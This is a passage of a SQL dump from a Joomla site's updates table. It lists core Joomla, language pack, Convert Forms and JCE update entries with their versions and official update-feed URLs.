(928, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(929, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(930, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(931, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(932, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(933, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(934, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(935, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(936, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(937, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(938, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(939, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(940, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(941, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(942, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(943, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(944, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(945, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(946, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(947, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(948, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(949, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(950, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(951, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(952, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(953, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(954, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(955, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(956, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(957, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(958, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(959, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(960, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(961, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(962, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(963, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(964, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(965, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(966, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(967, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(968, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(969, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(970, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(971, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(972, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(973, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(974, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(975, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(976, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(977, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(978, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(979, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(980, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(981, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(982, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(983, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(984, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(985, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(986, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(987, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(988, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(989, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(990, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(991, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(992, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(993, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(994, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(995, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(996, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(997, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(998, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(999, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(1000, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1001, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1002, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1003, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1004, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1005, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1006, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1007, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1008, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1009, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1010, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1011, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1012, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1013, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1014, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1015, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1016, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1017, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1018, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1019, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1020, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1021, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1022, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1023, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1024, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1025, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1026, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1027, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1028, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1029, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1030, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1031, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1032, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1033, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1034, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1035, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1036, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1037, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1038, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1039, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1040, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1041, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(1042, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1043, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1044, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1045, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1046, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1047, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1048, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1049, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1050, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1051, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1052, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1053, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1054, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1055, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1056, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1057, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1058, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1059, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1060, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1061, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1062, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1063, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1064, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1065, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1066, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1067, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1068, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1069, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1070, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1071, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1072, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1073, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1074, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1075, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1076, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1077, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1078, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1079, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1080, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1081, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1082, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1083, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1084, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1085, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1086, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(1087, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1088, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1089, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1090, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1091, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1092, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1093, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1094, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1095, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1096, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1097, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1098, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1099, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1100, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1101, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1102, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
